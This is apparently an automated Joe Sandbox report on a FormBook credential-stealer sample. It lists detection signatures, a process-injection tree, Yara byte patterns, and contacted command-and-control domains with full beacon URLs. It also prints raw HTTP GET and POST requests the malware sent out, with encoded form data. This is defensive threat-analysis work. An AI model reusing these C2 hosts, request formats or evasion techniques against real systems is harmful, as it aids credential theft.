Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MGQeZjDXc3.exe

Overview

General Information

Sample name:MGQeZjDXc3.exe
renamed because original name is a hash value
Original sample name:2098959ee5c2ec3f2f8053cdd36fd789ab2c7575c65a78aed44d675859f4c5be.exe
Analysis ID:1569392
MD5:7b5010e993f3043fbc100be1c7984f85
SHA1:2af396c73fe4274816b0769c0cfb8b7638879a2d
SHA256:2098959ee5c2ec3f2f8053cdd36fd789ab2c7575c65a78aed44d675859f4c5be
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • MGQeZjDXc3.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\MGQeZjDXc3.exe" MD5: 7B5010E993F3043FBC100BE1C7984F85)
    • svchost.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\MGQeZjDXc3.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • PXASisZrdVntP.exe (PID: 6032 cmdline: "C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 368 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • PXASisZrdVntP.exe (PID: 2544 cmdline: "C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x36732:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1e8b1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ee33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16fb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x161b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16fb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MGQeZjDXc3.exe", CommandLine: "C:\Users\user\Desktop\MGQeZjDXc3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MGQeZjDXc3.exe", ParentImage: C:\Users\user\Desktop\MGQeZjDXc3.exe, ParentProcessId: 2308, ParentProcessName: MGQeZjDXc3.exe, ProcessCommandLine: "C:\Users\user\Desktop\MGQeZjDXc3.exe", ProcessId: 2304, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\MGQeZjDXc3.exe", CommandLine: "C:\Users\user\Desktop\MGQeZjDXc3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MGQeZjDXc3.exe", ParentImage: C:\Users\user\Desktop\MGQeZjDXc3.exe, ParentProcessId: 2308, ParentProcessName: MGQeZjDXc3.exe, ProcessCommandLine: "C:\Users\user\Desktop\MGQeZjDXc3.exe", ProcessId: 2304, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.zz82x.top/fk06/?tX=7fn4Kf88PV&UL=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE3/2dDz+8oerua7w1yE5hDJxyFiuXydNgJB2c0DMp1k0BW4j2sII=Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyz/qj8y/?UL=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FqnxCzX9ML9xT9Z05e0CpTZrp7KXB+HgH/zGECw7Rot5BzIIB/yw=&tX=7fn4Kf88PVAvira URL Cloud: Label: malware
            Source: http://www.ngmr.xyz/qj8y/Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyzAvira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/Avira URL Cloud: Label: malware
            Source: MGQeZjDXc3.exeReversingLabs: Detection: 65%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: MGQeZjDXc3.exeJoe Sandbox ML: detected
            Source: MGQeZjDXc3.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PXASisZrdVntP.exe, 00000005.00000002.3377839748.000000000076E000.00000002.00000001.01000000.00000005.sdmp, PXASisZrdVntP.exe, 00000007.00000000.2619222661.000000000076E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: MGQeZjDXc3.exe, 00000000.00000003.2141324382.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2138249915.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2451784081.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2453391017.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.000000000339E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2548033826.0000000004AD1000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2551331041.0000000004C88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MGQeZjDXc3.exe, 00000000.00000003.2141324382.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2138249915.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2451784081.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2453391017.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.000000000339E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2548033826.0000000004AD1000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2551331041.0000000004C88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.2514850170.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547714603.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378032576.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000006.00000002.3381029035.000000000545C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000006.00000002.3377629358.00000000030D5000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3380076501.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2845663760.00000000015BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000006.00000002.3381029035.000000000545C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000006.00000002.3377629358.00000000030D5000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3380076501.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2845663760.00000000015BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.2514850170.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547714603.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378032576.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AE6CA9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00AE60DD
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00AE63F9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00AEEB60
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00AEF5FA
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEF56F FindFirstFileW,FindClose,0_2_00AEF56F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AF1B2F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AF1C8A
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00AF1F94

            Networking

            barindex
            Source: DNS query: www.ngmr.xyz
            Source: Joe Sandbox ViewIP Address: 38.47.232.196 38.47.232.196
            Source: Joe Sandbox ViewIP Address: 54.67.87.110 54.67.87.110
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00AF4EB5
            Source: global trafficHTTP traffic detected: GET /r22w/?tX=7fn4Kf88PV&UL=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqGipW/k2jsn/JKtfcj1kIMoHAw6q9wizkelVyrc4WhkWHt6hmqYs= HTTP/1.1Host: www.healthyloveforall.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /fk06/?tX=7fn4Kf88PV&UL=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE3/2dDz+8oerua7w1yE5hDJxyFiuXydNgJB2c0DMp1k0BW4j2sII= HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /mgg3/?UL=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY25FhT4OGOXAIr1rjNwK/1/eOG81EIQGExdwYvr17BwuFAzREpBF4=&tX=7fn4Kf88PV HTTP/1.1Host: www.ophthalmo.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /qj8y/?UL=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FqnxCzX9ML9xT9Z05e0CpTZrp7KXB+HgH/zGECw7Rot5BzIIB/yw=&tX=7fn4Kf88PV HTTP/1.1Host: www.ngmr.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global trafficDNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.ophthalmo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
            Source: global trafficDNS traffic detected: DNS query: www.specialgift.asia
            Source: unknownHTTP traffic detected: POST /fk06/ HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.zz82x.topConnection: closeContent-Length: 207Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.zz82x.top/fk06/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Data Raw: 55 4c 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 59 74 65 34 67 58 4e 4b 72 58 74 49 70 4f 2b 49 31 30 32 55 61 6f 4c 58 70 35 6b 43 61 71 72 35 6e 2b 64 65 79 77 31 69 41 43 50 Data Ascii: UL=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Yte4gXNKrXtIpO+I102UaoLXp5kCaqr5n+deyw1iACP
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 17:36:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 17:36:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
